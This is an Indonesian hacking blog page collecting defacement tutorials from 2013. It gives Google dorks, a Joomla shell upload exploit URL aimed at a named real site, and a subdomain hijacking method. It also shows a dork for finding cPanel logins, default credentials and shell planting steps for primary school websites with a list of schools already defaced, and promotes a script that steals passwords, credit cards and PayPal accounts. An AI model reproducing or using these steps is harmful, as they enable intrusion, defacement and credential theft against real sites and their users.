Home » Posts filed under Deface
Showing posts with label Deface. Show all posts
Showing posts with label Deface. Show all posts

Sunday, December 15, 2013

SCRIPT AUTOMATIS KIRIM PASSWORD DAN EMAIL

GoogleNewws.blogspot.com - Liat di facebook pada show off depesan mending maen kaya gini gan, nih saya kasih trik biar password dan email secara automatis terkirim ke email juragan, script ini juga bisa di pakai mendapatkan kartu kredit dan akun paypal.


Pertama buat lah file php.ini dan isi dengan display_errors = Off 
di folder yang ingin di sisipin script auto send password ya gan. klo sudah ada ga usah. 
salmin.org

Kedua Modifikasi script PHP dengan menambah error_reporting(0); contoh di login.php
kalau saya kasih contoh di login member gan, agan terserah mau di mana hehehe
Posted by Unknown at 1:14 AM 0 comments
Labels: ,

Friday, December 13, 2013

Exploit Joomla Component com_aclassif shell upload Vulnerability

Ini exploit lama sih. tapi baru nemu tadi di grup. Yaudah sekalian share di blog. Mungkin berguna buat newbie seperti saya . =)).
Oke, langsung saja.
Bahan :
1. backdoor shell, file .html / .txt
2. dork : inurl:"index.php?option=com_aclassif"
3. Exploit : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
Langsung saja kita cari target di google dengan dork diatas.
Sebagai contoh, saya dapet target http://www.stabledock.com/
masukkan exploitnya menjadi : http://www.stabledock.com/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
Tinggal isi data datanya. Boleh ngasal kok. Terakhir, upload filenya di attachment .
NB : beberapa situs memungkinkan kita untuk upload file .php dan .html , namun ada juga yang hanya bisa upload .txt seperti situs diatas.

Jika sudah, tinggal klik link yang ada di keterangan seperti gambar diatas.
http://www.stabledock.com/components/com_aclassif/photos/mtmd23.txt

Sekian tutorial kali ini. Semoga bermanfaat.
Posted by Unknown at 7:43 PM 0 comments
Labels: ,

Thursday, December 12, 2013

Cara Deface Fake Subdomain

http://www.nanang.co/2013/10/deface-fake-subdomain-dengan-hosting.html


oke langsung aja ke tutorial Peace

1. Buat Account di hosting gratisan, contohnya punya saya http://idhostinger.com

2. Setelah itu masukan domain punya kamu 

3. Setelah itu Pergi ke http://www.yougetsignal.com/tools/web-si...eb-server/

Masukan domain kamu, contoh punya ane http://devilscream.p.ht/

nanti akan muncul web yang 1 server dengan domain saya Peace

[Image: 30vnn7a.png]

nah pilih target Lalalala

Contoh target saya http://rizkipramana.com/

4. Setelah itu Masuk Ke Fitur Hosting yaitu Parked Domain atau Parkir Domain

[Image: fbi4v7.png]

nah masukan subdomain yang kalian mau, contoh punya saya devilscream.rizkipramana.com

Setelah itu Klik Parked Domain

5. Setelah itu Masukan Ke File Manager kalian , lalu buat sebuah File index.htm terserah isinya mau script deface atau apa Peace

6. Lalu lihat subdomain yang dibuat tadih Lalalala

hasilnya
http://devilscream.rizkipramana.com

sekian thread dari anePeace
Posted by Unknown at 2:01 PM 0 comments
Labels: ,

Cara Mendapatkan Cpanel Dengan Mudah

Assalamualaikum...

Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :) Cukup simple aja..

Pertama gunakan dork untuk mencari Cpanelnya 
 inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.

Nah tinggal dibuka satu satu Cpanelnya yah :)

Maaf yah, kalo cuma begitu, lagi males ngapa2in :p Semoga bermanfaat aja :v
Posted by Unknown at 1:47 PM 0 comments
Labels: ,

Sunday, December 8, 2013

Tutorial Deface Web .sch.id



Pagi sobat Google Newws, admin mau share tutorial dkit nih.. mungkin tutorial ini tidak layak, tapi apa salahnya kita untuk tester security web-web di indonesia Onion-105

Tutorialnya gini:
[+] Pertama tulis dorknya di google
inurl:sch.id" intext:"tim balitbang" intext:"sdn"

[+] Lalu pilih salah satu websitenya
[+] Setelah mendapatkan websitenya gunakan exploit sbb : /member/index.php atau /member/user.php
[+] Login Dengan User dan Password Defaultnya

Admin : 123456
Kickdody : 123456
Siswanto : 123456
Alumni : 123456
Alan : 123456
Tomi : 123456

Nah klo gak bisa login, Coba pilih website lain.. Intinya jangan menyerah gara-gara gak bisa login dalam sebuah website, dan terus semangat untuk mencoba semua website Th_0pride
Kalo bisa login tinggal di eksekusi deh, terserah kakak mau di apa-apain ^_^ klo mau tanam shell di sim>data laporan>tambah laporan

Ini List Deface Dari Kadal Cyber Team, dari tadi malam cuman dapat 2 Onion-68

http://sdnperumnasccjogja[dot]sch.id/
http://sdnpurwodadi1purwodadipasuruan[dot]sch.id/

NB : Tulisan berwarna merah pada dork itu adalah target sekolah yang mau kita deface, sdn (untuk "Sekolah Dasar), smpn (untuk "Sekolah Menengah Pertama) , SMAN (Untuk Sekolah Menengah Atas)}

Regards: dcr00ter
Posted by Unknown at 9:53 AM 0 comments
Labels: ,
Subscribe to: Posts (Atom)
 
 
All Right Reserved - Google Newws | Share It
Design by Google Newws | Like Our Fanspage Google Newws